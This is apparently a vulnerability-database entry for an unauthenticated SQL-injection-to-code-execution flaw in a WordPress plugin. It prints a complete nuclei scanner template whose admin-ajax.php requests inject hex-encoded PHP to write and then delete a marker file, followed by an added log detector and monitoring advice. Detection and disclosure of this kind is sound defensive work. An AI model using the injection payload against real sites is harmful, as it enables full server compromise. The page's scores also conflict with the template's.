FlipperCode Custom CSS, JS & PHP <= 2.0.7 - Remote Code Execution

Published: 04 Jul 2026 03:00:48
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com
Views: 19

FlipperCode WordPress plugin up to 2.0.7 allows unauthenticated remote code execution via unsanitized input.

Related

Reporter | Title | Published | Family
GithubExploit | wp-exploit | 30 Jun 2026 09:55 | githubexploit
GithubExploit | Exploit for CVE-2026-6433 | 16 May 2026 09:29 | githubexploit
ATTACKERKB | CVE-2026-6433 | 11 May 2026 06:00 | attackerkb
Circl | CVE-2026-6433 | 11 May 2026 06:35 | circl
CNNVD | WordPress plugin Custom css-js-php security vulnerability | 11 May 2026 00:00 | cnnvd
CVE | CVE-2026-6433 | 11 May 2026 06:00 | cve
Cvelist | CVE-2026-6433 Custom CSS JS PHP <= 2.0.7 - Unauthenticated SQL Injection to RCE | 11 May 2026 06:00 | cvelist
EUVD | EUVD-2026-29034 | 11 May 2026 06:31 | euvd
NVD | CVE-2026-6433 | 11 May 2026 06:16 | nvd
Patchstack | WordPress Custom CSS JS PHP plugin <= 2.0.7 - Unauthenticated SQL Injection to RCE vulnerability | 12 May 2026 09:51 | patchstack

Code

id: CVE-2026-6433

info:
  name: FlipperCode Custom CSS, JS & PHP <= 2.0.7 - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    Custom css-js-php WordPress plugin through 2.0.7 contains a command injection caused by unsanitized user input that is used in a SQL query and then passed to eval(), letting unauthenticated attackers execute arbitrary PHP code on the server.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code on the server, leading to full server compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://wpscan.com/vulnerability/a0b1c059-e156-4402-ac8d-67f8ad7386cc/
    - https://github.com/murrez/CVE-2026-6433
    - https://patchstack.com/database/wordpress/plugin/custom-css-js-php/vulnerability/wordpress-custom-css-js-php-plugin-2-0-7-unauthenticated-sql-injection-to-rce-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2026-6433
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-6433
    epss-score: 0.00753
    epss-percentile: 0.50537
  metadata:
    verified: true
    max-request: 3
    vendor: flippercode
    product: custom-css-js-php
    framework: wordpress
    shodan-query: http.component:"WordPress"
  tags: cve,cve2026,wordpress,wp-plugin,sqli,rce,custom-css-js-php,unauth,intrusive,vkev

variables:
  filename: "{{rand_text_alpha(8)}}"
  marker: "{{rand_text_alpha(12)}}"

flow: |
  http(1) && http(2) && http(3);

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,'t','php',0x3c3f7068702066696c655f7075745f636f6e74656e74732827{{hex_encode(filename)}}2e747874272c27{{hex_encode(marker)}}27293b203f3e,'header','',0,1--+

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 || status_code == 500"
        internal: true

  - raw:
      - |
        GET /wp-admin/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{marker}}"

      - type: status
        status:
          - 200

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,'t','php',0x3c3f7068702040756e6c696e6b2827{{hex_encode(filename)}}2e74787427293b203f3e,'header','',0,1--+

    matchers:
      - type: dsl
        dsl:
          - "true"
        internal: true
# digest: 490a0046304402207afeff0fa3575ad7d4394ae3cbc16f67d58f0aa4df282b565b25b04cba7b6f1a022076996acea826bd8126551a1220cfd7e6f5abb0f7cffd96d51000174c60f496b3:922c64590222798bb761d5b6d8e72950
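
The template above reaches the vulnerable code through admin-ajax.php with action=fc_ajax_call, operation=wce_editor_inline_code and a SQL payload in the id parameter, which the plugin should only ever accept as an integer. The following detector is an added example written for this page; it is not part of the nuclei template or of the Vulners record. It scans a constructed JSON-lines log (a hypothetical reverse-proxy format that records POST form bodies, since ordinary access logs do not) and flags calls whose id is not a plain integer, escalating when the value carries SQL keywords or a hex-encoded PHP open tag like the one the template injects. All log lines, addresses and the shortened hex literal are constructed.

```python
"""Detect CVE-2026-6433 exploitation attempts in a request log.

Added example, not the template's or the plugin's own code. Assumes a
hypothetical JSON-lines log in which each record carries "src", "method",
"path" and the decoded form "body" of a POST request.
"""
import json
import re
from typing import List, Optional
from urllib.parse import parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"
VULN_ACTION = "fc_ajax_call"
VULN_OPERATION = "wce_editor_inline_code"

# SQL keywords that never belong in an integer record id.
SQL_KEYWORD_RE = re.compile(r"\b(union|select)\b", re.IGNORECASE)
# Hex encoding of "<?": the start of an injected PHP payload, as in the
# 0x3c3f7068... literal the template sends to be stored and eval()'d.
PHP_OPEN_TAG_HEX = "0x3c3f"

# Constructed sample log (hypothetical format). The third record uses a
# shortened hex literal (0x3c3f70687020 == "<?php ") purely for illustration.
SAMPLE_LOG = "\n".join([
    json.dumps({"src": "198.51.100.7", "method": "POST", "path": AJAX_PATH,
                "body": "action=fc_ajax_call&operation=wce_editor_inline_code&id=42"}),
    json.dumps({"src": "192.0.2.3", "method": "POST", "path": AJAX_PATH,
                "body": "action=heartbeat&_nonce=abc123"}),
    json.dumps({"src": "203.0.113.9", "method": "POST", "path": AJAX_PATH,
                "body": "action=fc_ajax_call&operation=wce_editor_inline_code"
                        "&id=0+UNION+SELECT+1,'t','php',0x3c3f70687020,'header','',0,1--+"}),
    json.dumps({"src": "203.0.113.9", "method": "POST", "path": AJAX_PATH,
                "body": "action=fc_ajax_call&operation=wce_editor_inline_code&id=0 OR 1=1"}),
])


def classify_id(raw_id: str) -> Optional[str]:
    """Return a severity for a suspicious id value, or None if it is a plain integer."""
    if re.fullmatch(r"\d+", raw_id.strip()):
        return None
    if PHP_OPEN_TAG_HEX in raw_id.lower():
        return "critical"  # SQLi payload carrying hex-encoded PHP: RCE attempt
    if SQL_KEYWORD_RE.search(raw_id):
        return "high"      # SQL keywords in an integer field: injection probe
    return "medium"        # anything else non-numeric: malformed or tampered


def analyze(line: str) -> Optional[dict]:
    """Inspect one log record; return an alert dict or None if benign."""
    event = json.loads(line)
    if event.get("path") != AJAX_PATH:
        return None
    params = parse_qs(event.get("body", ""), keep_blank_values=True)
    if params.get("action", [""])[0] != VULN_ACTION:
        return None
    if params.get("operation", [""])[0] != VULN_OPERATION:
        return None
    raw_id = params.get("id", [""])[0]
    severity = classify_id(raw_id)
    if severity is None:
        return None
    return {"src": event.get("src"), "severity": severity, "id": raw_id}


def scan(log_text: str) -> List[dict]:
    """Run analyze() over every non-empty line and collect the alerts."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        alert = analyze(line)
        if alert is not None:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"[{alert['severity']}] {alert['src']} id={alert['id']!r}")
```

The same check applies to the query string when the parameters arrive via GET, which admin-ajax.php also accepts. Because the template writes a marker file into wp-admin and then deletes it, file-integrity monitoring of that directory for short-lived .txt files is a second, independent signal.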


Scores (current as of 26 May 2026 09:52)
Vulners AI Score: 6.3 (Medium risk)
CVSS 3.1: 7.3
EPSS: 0.00753
Views: 19